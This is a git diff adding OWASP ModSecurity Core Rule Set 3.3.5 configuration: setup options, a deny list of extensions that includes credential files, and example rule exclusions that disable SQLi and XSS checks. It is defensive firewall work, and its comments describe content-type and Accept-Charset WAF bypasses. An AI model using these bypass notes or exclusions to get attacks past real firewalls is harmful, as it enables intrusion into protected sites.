+# You may adjust these points to your liking, but this is usually not needed. +# +# - CRITICAL severity: Anomaly Score of 5. +# Mostly generated by the application attack rules (93x and 94x files). +# - ERROR severity: Anomaly Score of 4. +# Generated mostly from outbound leakage rules (95x files). +# - WARNING severity: Anomaly Score of 3. +# Generated mostly by malicious client rules (91x files). +# - NOTICE severity: Anomaly Score of 2. +# Generated mostly by the protocol rules (92x files). +# +# In anomaly mode, these scores are cumulative. +# So it's possible for a request to hit multiple rules. +# +# (Note: In this file, we use 'phase:1' to set CRS configuration variables. +# In general, 'phase:request' is used. However, we want to make absolutely sure +# that all configuration variables are set before the CRS rules are processed.) +# +#SecAction \ +# "id:900100,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.critical_anomaly_score=5,\ +# setvar:tx.error_anomaly_score=4,\ +# setvar:tx.warning_anomaly_score=3,\ +# setvar:tx.notice_anomaly_score=2" + + +# +# -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------ +# +# Here, you can specify at which cumulative anomaly score an inbound request, +# or outbound response, gets blocked. +# +# Most detected inbound threats will give a critical score of 5. +# Smaller violations, like violations of protocol/standards, carry lower scores. +# +# [ At default value ] +# If you keep the blocking thresholds at the defaults, the CRS will work +# similarly to previous CRS versions: a single critical rule match will cause +# the request to be blocked and logged. +# +# [ Using higher values ] +# If you want to make the CRS less sensitive, you can increase the blocking +# thresholds, for instance to 7 (which would require multiple rule matches +# before blocking) or 10 (which would require at least two critical alerts - or +# a combination of many lesser alerts), or even higher. 
However, increasing the +# thresholds might cause some attacks to bypass the CRS rules or your policies. +# +# [ New deployment strategy: Starting high and decreasing ] +# It is a common practice to start a fresh CRS installation with elevated +# anomaly scoring thresholds (>100) and then lower the limits as your +# confidence in the setup grows. You may also look into the Sampling +# Percentage section below for a different strategy to ease into a new +# CRS installation. +# +# [ Anomaly Threshold / Paranoia Level Quadrant ] +# +# High Anomaly Limit | High Anomaly Limit +# Low Paranoia Level | High Paranoia Level +# -> Fresh Site | -> Experimental Site +# ------------------------------------------------------ +# Low Anomaly Limit | Low Anomaly Limit +# Low Paranoia Level | High Paranoia Level +# -> Standard Site | -> High Security Site +# +# Uncomment this rule to change the defaults: +# +#SecAction \ +# "id:900110,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.inbound_anomaly_score_threshold=5,\ +# setvar:tx.outbound_anomaly_score_threshold=4" + +# +# -- [[ Application Specific Rule Exclusions ]] ---------------------------------------- +# +# Some well-known applications may undertake actions that appear to be +# malicious. This includes actions such as allowing HTML or Javascript within +# parameters. In such cases the CRS aims to prevent false positives by allowing +# administrators to enable prebuilt, application specific exclusions on an +# application by application basis. +# These application specific exclusions are distinct from the rules that would +# be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as +# they are prebuilt for specific applications. The 'REQUEST-900' file is +# designed for users to add their own custom exclusions. Note, using these +# application specific exclusions may loosen restrictions of the CRS, +# especially if used with an application they weren't designed for. 
As a result +# they should be applied with care. +# To use this functionality you must specify a supported application. To do so +# uncomment rule 900130. In addition to uncommenting the rule you will need to +# specify which application(s) you'd like to enable exclusions for. Only a +# (very) limited set of applications are currently supported, please use the +# filenames prefixed with 'REQUEST-903' to guide you in your selection. +# Such filenames use the following convention: +# REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf +# +# It is recommended if you run multiple web applications on your site to limit +# the effects of the exclusion to only the path where the excluded webapp +# resides using a rule similar to the following example: +# SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1 + +# +# Modify and uncomment this rule to select which application: +# +#SecAction \ +# "id:900130,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.crs_exclusions_cpanel=1,\ +# setvar:tx.crs_exclusions_drupal=1,\ +# setvar:tx.crs_exclusions_dokuwiki=1,\ +# setvar:tx.crs_exclusions_nextcloud=1,\ +# setvar:tx.crs_exclusions_wordpress=1,\ +# setvar:tx.crs_exclusions_xenforo=1" + +# +# -- [[ HTTP Policy Settings ]] ------------------------------------------------ +# +# This section defines your policies for the HTTP protocol, such as: +# - allowed HTTP versions, HTTP methods, allowed request Content-Types +# - forbidden file extensions (e.g. .bak, .sql) and request headers (e.g. Proxy) +# +# These variables are used in the following rule files: +# - REQUEST-911-METHOD-ENFORCEMENT.conf +# - REQUEST-912-DOS-PROTECTION.conf +# - REQUEST-920-PROTOCOL-ENFORCEMENT.conf + +# HTTP methods that a client is allowed to use. 
+# Default: GET HEAD POST OPTIONS +# Example: for RESTful APIs, add the following methods: PUT PATCH DELETE +# Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK +# MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK +# Uncomment this rule to change the default. +#SecAction \ +# "id:900200,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" + +# Content-Types that a client is allowed to send in a request. +# Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| +# |text/xml| |application/xml| |application/soap+xml| |application/json| +# |application/cloudevents+json| |application/cloudevents-batch+json| +# +# Please note, that the rule where CRS uses this variable (920420) evaluates it with operator +# `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom +# Content-Type with lowercase. +# +# Bypass Warning: some applications may not rely on the content-type request header in order +# to parse the request body. This could make an attacker able to send malicious URLENCODED/JSON/XML +# payloads without being detected by the WAF. Allowing request content-type that doesn't activate any +# body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..) +# could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain" +# content type may still be interpreted as JSON by a backend application but would not trigger the +# JSON body parser at the WAF, leading to a bypass. +# +# To prevent blocking request with not allowed content-type by default, you can create an exclusion +# rule that removes rule 920420. 
For example: +# SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \ +# "id:1234,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# ctl:ruleRemoveById=920420,\ +# chain" +# SecRule REQUEST_URI "@rx ^/foo/bar" "t:none" +# +# Uncomment this rule to change the default. +# +#SecAction \ +# "id:900220,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" + +# Allowed HTTP versions. +# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so +# we include both version strings by default. +# Uncomment this rule to change the default. +#SecAction \ +# "id:900230,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" + +# Forbidden file extensions. +# Guards against unintended exposure of development/configuration files. +# Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ +# Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ +# Uncomment this rule to change the default. 
+#SecAction \ +# "id:900240,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Forbidden request headers. +# Header names should be lowercase, enclosed by /slashes/ as delimiters. +# Default: /accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ +# +# Note: Accept-Charset is a deprecated header that should not be used by clients and +# ignored by servers. It can be used for a response WAF bypass, by asking for a charset +# that the WAF cannot decode. +# Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset +# +# Note: Content-Encoding is used to list any encodings that have been applied to the +# original payload. It is only used for compression, which isn't supported by CRS by +# default since it blocks newlines and null bytes inside the request body. Most +# compression algorithms require at least null bytes per RFC. Blocking it shouldn't +# break anything and increases security since ModSecurity is incapable of properly +# scanning compressed request bodies. +# +# Note: Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org +# +# Uncomment this rule to change the default. +#SecAction \ +# "id:900250,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" + +# File extensions considered static files. +# Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. +# Used in DoS protection rule. See section "Anti-Automation / DoS Protection". 
+# Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ +# Uncomment this rule to change the default. +#SecAction \ +# "id:900260,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" + +# Content-Types charsets that a client is allowed to send in a request. +# Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 +# Uncomment this rule to change the default. +# Use "|" to separate multiple charsets like in the rule defining +# tx.allowed_request_content_type. +#SecAction \ +# "id:900280,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" + +# +# -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- +# +# Here you can define optional limits on HTTP get/post parameters and uploads. +# This can help to prevent application specific DoS attacks. +# +# These values are checked in REQUEST-920-PROTOCOL-ENFORCEMENT.conf. +# Beware of blocking legitimate traffic when enabling these limits. +# + +# Block request if number of arguments is too high +# Default: unlimited +# Example: 255 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900300,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_num_args=255" + +# Block request if the length of any argument name is too high +# Default: unlimited +# Example: 100 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900310,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_name_length=100" + +# Block request if the length of any argument value is too high +# Default: unlimited +# Example: 400 +# Uncomment this rule to set a limit. 
+#SecAction \ +# "id:900320,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_length=400" + +# Block request if the total length of all combined arguments is too high +# Default: unlimited +# Example: 64000 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900330,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.total_arg_length=64000" + +# Block request if the file size of any individual uploaded file is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900340,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_file_size=1048576" + +# Block request if the total size of all combined uploaded files is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900350,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.combined_file_sizes=1048576" + + +# +# -- [[ Easing In / Sampling Percentage ]] ------------------------------------- +# +# Adding the Core Rule Set to an existing productive site can lead to false +# positives, unexpected performance issues and other undesired side effects. +# +# It can be beneficial to test the water first by enabling the CRS for a +# limited number of requests only and then, when you have solved the issues (if +# any) and you have confidence in the setup, to raise the ratio of requests +# being sent into the ruleset. +# +# Adjust the percentage of requests that are funnelled into the Core Rules by +# setting TX.sampling_percentage below. The default is 100, meaning that every +# request gets checked by the CRS. The selection of requests, which are going +# to be checked, is based on a pseudo random number generated by ModSecurity. +# +# If a request is allowed to pass without being checked by the CRS, there is no +# entry in the audit log (for performance reasons), but an error log entry is +# written. 
If you want to disable the error log entry, then issue the +# following directive somewhere after the inclusion of the CRS +# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). +# +# SecRuleUpdateActionById 901150 "nolog" +# +# ATTENTION: If this TX.sampling_percentage is below 100, then some of the +# requests will bypass the Core Rules completely and you lose the ability to +# protect your service with ModSecurity. +# +# Uncomment this rule to enable this feature: +# +#SecAction "id:900400,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.sampling_percentage=100" + + +# +# -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ +# +# Optionally, you can check the client IP address against the Project Honey Pot +# HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a +# free API key. Set it here with SecHttpBlKey. +# +# Project Honeypot returns multiple different malicious IP types. +# You may specify which you want to block by enabling or disabling them below. +# +# Ref: https://www.projecthoneypot.org/httpbl.php +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey +# +# Uncomment these rules to use this feature: +# +#SecHttpBlKey XXXXXXXXXXXXXXXXX +#SecAction "id:900500,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.block_search_ip=1,\ +# setvar:tx.block_suspicious_ip=1,\ +# setvar:tx.block_harvester_ip=1,\ +# setvar:tx.block_spammer_ip=1" + + +# +# -- [[ GeoIP Database ]] ------------------------------------------------------ +# +# There are some rulesets that inspect geolocation data of the client IP address +# (geoLookup). The CRS uses geoLookup to implement optional country blocking. +# +# To use geolocation, we make use of the MaxMind GeoIP database. +# This database is not included with the CRS and must be downloaded. +# +# There are two formats for the GeoIP database. 
ModSecurity v2 uses GeoLite (.dat files), +# and ModSecurity v3 uses GeoLite2 (.mmdb files). +# +# If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, +# see https://github.com/maxmind/geoipupdate. +# +# Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ +# for configuration options. +# +# Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. +# See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. +# +# Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files +# from CSV files first. +# +# You can achieve this using https://github.com/sherpya/geolite2legacy +# Pick the zip files from maxmind site: +# https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip +# +# Follow the guidelines for installing the tool and run: +# ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ +# -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat +# +# Update the database regularly, see Step 3 of the configuration link above. +# +# By default, when you execute `sudo geoipupdate` on Linux, files from the free database +# will be downloaded to `/usr/share/GeoIP` (both v1 and v2). +# +# Then choose from: +# - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) +# - `GeoLiteCountry.dat` (if you are using ModSecurity v2) +# +# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html +# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html +# +# Uncomment only one of the next rules here to use this feature. 
+# Choose the one depending on the ModSecurity version you are using, and change the path accordingly:
+#
+# For ModSecurity v3:
+#SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb
+# For ModSecurity v2 (points to the converted one):
+#SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat
+
+#
+# -=[ Block Countries ]=-
+#
+# Rules in the IP Reputation file can check the client against a list of high
+# risk country codes. These countries have to be defined in the variable
+# tx.high_risk_country_codes via their ISO 3166 two-letter country code:
+# https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements
+#
+# If you are sure that you are not getting any legitimate requests from a given
+# country, then you can disable all access from that country via this variable.
+# The rule performing the test has the rule id 910100.
+#
+# This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be
+# downloaded (see the section "GeoIP Database" above.)
+#
+# By default, the list is empty. A list used by some sites was the following:
+# setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'"
+#
+# Uncomment this rule to use this feature:
+#
+#SecAction \
+# "id:900600,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:'tx.high_risk_country_codes='"
+
+
+#
+# -- [[ Anti-Automation / DoS Protection ]] ------------------------------------
+#
+# Optional DoS protection against clients making requests too quickly.
+#
+# When a client is making more than 100 requests (excluding static files) within
+# 60 seconds, this is considered a 'burst'. After two bursts, the client is
+# blocked for 600 seconds.
+#
+# Requests to static files are not counted towards DoS; they are listed in the
+# 'tx.static_extensions' setting, which you can change in this file (see
+# section "HTTP Policy Settings").
+#
+# For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf.
+#
+# Uncomment this rule to use this feature:
+#
+#SecAction \
+# "id:900700,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:'tx.dos_burst_time_slice=60',\
+# setvar:'tx.dos_counter_threshold=100',\
+# setvar:'tx.dos_block_timeout=600'"
+
+
+#
+# -- [[ Check UTF-8 encoding ]] ------------------------------------------------
+#
+# The CRS can optionally check request contents for invalid UTF-8 encoding.
+# We only want to apply this check if UTF-8 encoding is actually used by the
+# site; otherwise it will result in false positives.
+#
+# Uncomment this rule to use this feature:
+#
+#SecAction \
+# "id:900950,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.crs_validate_utf8_encoding=1"
+
+
+#
+# -- [[ Blocking Based on IP Reputation ]] ------------------------------------
+#
+# Blocking based on reputation is permanent in the CRS. Unlike other rules,
+# which look at the individual request, the blocking of IPs is based on
+# a persistent record in the IP collection, which remains active for a
+# certain amount of time.
+#
+# There are two ways an individual client can become flagged for blocking:
+# - External information (RBL, GeoIP, etc.)
+# - Internal information (Core Rules)
+#
+# The record in the IP collection carries a flag, which tags requests from
+# individual clients with a flag named IP.reput_block_flag.
+# But the flag alone is not enough to have a client blocked. There is also
+# a global switch named tx.do_reput_block. This is off by default. If you set
+# it to 1 (=On), requests from clients with the IP.reput_block_flag will
+# be blocked for a certain duration.
+#
+# Variables
+# ip.reput_block_flag Blocking flag for the IP collection record
+# ip.reput_block_reason Reason (= rule message) that caused to blocking flag
+# tx.do_reput_block Switch deciding if we really block based on flag
+# tx.reput_block_duration Setting to define the duration of a block
+#
+# It may be important to know, that all the other core rules are skipped for
+# requests, when it is clear that they carry the blocking flag in question.
+#
+# Uncomment this rule to use this feature:
+#
+#SecAction \
+# "id:900960,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.do_reput_block=1"
+#
+# Uncomment this rule to change the blocking time:
+# Default: 300 (5 minutes)
+#
+#SecAction \
+# "id:900970,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.reput_block_duration=300"
+
+
+#
+# -- [[ Collection timeout ]] --------------------------------------------------
+#
+# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour)
+# to a lower setting which is appropriate to most sites.
+# This increases performance by cleaning out stale collection (block) entries.
+#
+# This value should be greater than or equal to:
+# tx.reput_block_duration (see section "Blocking Based on IP Reputation") and
+# tx.dos_block_timeout (see section "Anti-Automation / DoS Protection").
+#
+# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout
+
+# Please keep this directive uncommented.
+# Default: 600 (10 minutes)
+SecCollectionTimeout 600
+
+
+#
+# -- [[ End of setup ]] --------------------------------------------------------
+#
+# The CRS checks the tx.crs_setup_version variable to ensure that the setup
+# has been loaded. If you are not planning to use this setup template,
+# you must manually set the tx.crs_setup_version variable before including
+# the CRS rules/* files.
+#
+# The variable is a numerical representation of the CRS version number.
+# E.g., v3.0.0 is represented as 300.
+#
+SecAction \
+ "id:900990,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ setvar:tx.crs_setup_version=335"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/docs/README b/src/common/core/modsecurity/files/coreruleset-v3/docs/README
new file mode 100644
index 000000000..281651e7e
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/docs/README
@@ -0,0 +1,8 @@
+Welcome to the OWASP Core Rule Set (CRS) documentation.
+The OWASP CRS documentation is generated as a Sphinx project and is stored in a separate Github repository. While the documentation is available as part of the CRS project it is provided in the form of a git-submodule. Using a git-submodule allow us to update the documentation without making changes to the main rule repository.
+
+You can download the documentation using git:
+ $ git submodule init
+ $ git submodule update
+
+Alternatively, the latest version of the documentation is available at https://www.modsecurity.org/CRS/Documentation/
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
new file mode 100644
index 000000000..ad857bfb0
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
@@ -0,0 +1,166 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# The purpose of this file is to hold LOCAL exceptions for your site. The
+# types of rules that would go into this file are one where you want to
+# short-circuit inspection and allow certain transactions to pass through
+# inspection or if you want to alter rules that are applied.
+#
+# This file is named REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example for a
+# very specific reason. Files affixed with the .example extension are designed
+# to contain user created/modified data. The '.example'. extension should be
+# renamed to end in .conf. The advantage of this is that when OWASP CRS is
+# updated, the updates will not overwrite a user generated configuration file.
+#
+# As a result of this design paradigm users are encouraged NOT to directly
+# modify rules. Instead they should use this
+# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and the
+# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS file to modify OWASP rules using
+# methods similar to the examples specified below.
+#
+# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and
+# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS serve different purposes. ModSecurity
+# effectively maintains two different context: startup, and per transaction.
+# As a rule, directives are processed within the startup context. While they
+# can affect the per transaction context they generally remain fixed during the
+# execution of ModSecurity.
+#
+# As a result if one wanted to disable a rule at bootup the SecRuleRemoveById
+# directive or one of its siblings would have to be placed AFTER the rule is
+# listed, otherwise it will not have knowledge of the rules existence (since
+# these rules are read in at the same time). This means that when using
+# directives that effect SecRules, these exceptions should be placed AFTER all
+# the existing rules. This is why RESPONSE-999-EXCLUSION-RULES-AFTER-CRS is
+# designed such that it loads LAST.
+#
+# Conversely, ModSecurity supports several actions that can change the state of
+# the underlying configuration during the per transaction context, this is when
+# rules are being processed. Generally, these are accomplished by using the
+# 'ctl' action. As these are part of a rule, they will be evaluated in the
+# order rules are applied (by physical location, considering phases). As a
+# result of this ordering a 'ctl' action should be placed with consideration to
+# when it will be executed. This is particularly relevant for the 'ctl' options
+# that involve modifying ID's (such as ruleRemoveById). In these cases it is
+# important that such rules are placed BEFORE the rule ID they will affect.
+# Unlike the setup context, by the time we process rules in the per-transaction
+# context, we are already aware of all the rule ID's. It is by this logic that
+# we include rules such as this BEFORE all the remaining rules. As a result
+# REQUEST-900-EXCLUSION-RULES-BEFORE-CRS is designed to load FIRST.
+#
+# As a general rule:
+# ctl:ruleEngine -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveTargetById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveTargetByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+# ctl:ruleRemoveTargetByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS
+#
+# SecRuleRemoveById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleRemoveByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleRemoveByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleUpdateActionById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleUpdateTargetById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleUpdateTargetByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+# SecRuleUpdateTargetByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+#
+#
+# What follows are a group of examples that show you how to perform rule
+# exclusions.
+#
+#
+# Example Exclusion Rule: Disable inspection for an authorized client
+#
+# This ruleset allows you to control how ModSecurity will handle traffic
+# originating from Authorized Vulnerability Scanning (AVS) sources.
See
+# related blog post -
+# http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html
+#
+# White-list ASV network block (no blocking or logging of AVS traffic) Update
+# IP network block as appropriate for your AVS traffic
+#
+# ModSec Rule Exclusion: Disable Rule Engine for known ASV IP
+# SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \
+# "id:1000,\
+# phase:1,\
+# pass,\
+# nolog,\
+# ctl:ruleEngine=Off"
+#
+#
+# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
+# for an individual rule
+#
+# This rule shows how to conditionally exclude the "password"
+# parameter for rule 942100 when the REQUEST_URI is /index.php
+# ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection
+#
+# SecRule REQUEST_URI "@beginsWith /index.php" \
+# "id:1001,\
+# phase:1,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveTargetById=942100;ARGS:password"
+#
+#
+# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
+# for only certain attacks
+#
+# Attack rules within the CRS are tagged, with tags such as 'attack-lfi',
+# 'attack-sqli', 'attack-xss', 'attack-injection-php', et cetera.
+#
+# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd
+# for all rules tagged attack-sqli
+# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
+# "id:1002,\
+# phase:2,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:pwd"
+#
+
+# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
+# for all CRS rules
+#
+# This rule illustrates that we can use tagging very effectively to whitelist a
+# common false positive across an entire ModSecurity instance. This can be done
+# because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT
+# affect custom rules.
+#
+# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd
+# for all CRS rules
+# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
+# "id:1003,\
+# phase:2,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd"
+
+#
+# Example Exclusion Rule: Removing a range of rules
+#
+# This rule illustrates that we can remove a rule range via a ctl action.
+# This uses the fact, that rules are grouped by topic in rule files covering
+# a certain id range.
+#
+# ModSecurity Rule Exclusion: Disable all SQLi and XSS rules
+# SecRule REQUEST_FILENAME "@beginsWith /admin" \
+# "id:1004,\
+# phase:2,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveById=941000-942999"
+#
+#
+# The application specific rule exclusion files
+# REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
+# REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf
+# bring additional examples which can be useful then tuning a service.
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-901-INITIALIZATION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-901-INITIALIZATION.conf
new file mode 100644
index 000000000..27fd54ad1
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-901-INITIALIZATION.conf
@@ -0,0 +1,470 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules
+# and performs preparatory actions. It also fixes errors and omissions
+# of variable definitions in the file crs-setup.conf.
